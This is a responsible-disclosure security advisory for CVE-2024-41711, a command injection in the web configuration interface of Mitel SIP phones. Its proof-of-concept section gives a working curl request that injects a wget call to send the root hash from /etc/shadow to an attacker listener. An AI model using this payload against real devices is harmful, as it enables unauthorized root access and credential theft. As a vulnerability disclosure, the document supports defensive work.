Security Advisory: Unauthenticated Command Injection in Mitel IP Phones

Summary

The Mitel Series SIP Phones web administration interface executes an unauthenticated OS command constructed with unsanitized user input.

‍

Affected Manufacturer: Mitel

Model: Mitel-6800/6900/6900w/6970

Versions: R6.4.0.HF1 (R6.4.0.136) and earlier

CVEs: CVE-2024-41711

Impact (CVSS): 8.8 (high) - AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

• Mitel 6800 Series SIP Phones    R6.4.0.HF1 (R6.4.0.136) and earlier
• Mitel 6900 Series SIP Phones R6.4.0.HF1 (R6.4.0.136) and earlier
• Mitel 6900w Series SIP Phone R6.4.0.HF1 (R6.4.0.136) and earlier
• Mitel 6970 Conference Unit R6.4.0.HF1 (R6.4.0.136) and earlier

Impact

By successfully exploiting this flaw, a remote unauthenticated attacker can execute arbitrary commands on the device with elevated privileges.

Description

The "webconfig" CGI binary manages the web administration interface and relies on an outdated method of input parsing. It is executed as a CGI binary of the HTTPD web server with the command:

/usr/sbin/httpd -h /webroot

This interface, which includes the “Ethernet Settings” page, processes user data without validation, allowing users to enter any input—strings, numbers, or special characters—which are then directly copied to configuration files. When users click “Save,” all entered data is written to the config file /nvdata/etc/enet.cfg and applied within the operating system as environment settings with the highest priority via the if_setup.sh up script. Additionally, attackers can exploit a concatenation bug that appends strings to the config file, enabling them to bypass string length restrictions (further details below).

Proof-Of-Concept

For this proof of concept, we'll craft an exploit that allows an attacker to read the root hash from the shadow file. To demonstrate both command injection and a string length bypass, we'll use the parameters "Router IP Address" and "Domain Name" for the attack, though an attacker could leverage any suitable parameter for their payload. Here, we input the command injection payload via the web interface, splitting it into two parts.

After pressing “Save“, you can see the following request being sent:

An attacker listening on port "4444" will receive the root hash string.

And config file - “/nvdata/etc/enet.cfg” - will looks like this:

Use the following curl command for testing, updating the IP address and Host address as needed—from “127.0.0.1” to the router’s IP address and the attacker's machine wher.

‍

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1' -H $'Content-Length: 344' \
    --data-binary $'\x0d\x0aMAIN%2FENETCFG_DHCP=on&MAIN%2FENETCFG_IPADDR=&MAIN%2FENETCFG_SUBNET=255.255.254.0&MAIN%2FENETCFG_ROUTER=%3Bwget+http%3A%2F%2F127.0.0.1&MAIN%2FENETCFG_DOMAIN=1%3A4444%2Fvers%3D%60wget+127.0.0.1%3A4444%2Fver%3D%5C%60grep+root+%2Fetc%2Fshadow%5C%60%60&MAIN%2FENETCFG_DNS1=10.136.128.11&MAIN%2FENETCFG_DNS2=1.1.1.1&MAIN%2FENETCFG_DNS3=10.10.10.10' \
    $'http://127.0.0.1/cgi-bin/webconfig?page=enetcfg&action=submit'

‍

Takeaways

These vulnerabilities highlight significant security risks in web administration interfaces that use outdated input parsing methods. The high CVSS score (8.8) underlines the critical nature of these flaws, which allow unauthenticated remote attackers to execute arbitrary commands with elevated privileges.

If you manage or use Mitel SIP phones—or any networked devices with embedded web interfaces—it's essential to assess and test your firmware for similar issues. This includes scanning for unvalidated user input and command injection points. Organizations should regularly review and update device firmware and implement strong input sanitization to prevent unauthorized system access and data breaches.

Timeline

• 2024-02-27: Vulnerability identified
• 2024-03-28: Sent coordinated disclosure request to PSIRT@mitel.com‍
• 2024-03-28: Received guidance on the secure communication channel from vendor
• 2024-04-09: Sent vulnerability disclosure report to the vendor through secure communication channel
• 2024-04-09: Vendor responded and start analysis
• 2024-05-01: Vendor responded that we was using old version and we need to test on the version 6.4 to proove findings
• 2024-05-14: We received latest version 6.4 and found that findings are still exist
• 2024-05-21: We shared update for the new version with proof-of-concepts for findings
• 2024-05-21: Vendor responded and start analysis
• 2024-06-21: Vendor confirmed “Unauthenticated Command Injection” findings and start working on the new release, we agreed to wait for Vendors Release and Advisory
• 2024-07-17: Vendor published Security Advisory 24-0020 for found issue
• 2024-07-30: Vendor provided CVE number - CVE-2024-41711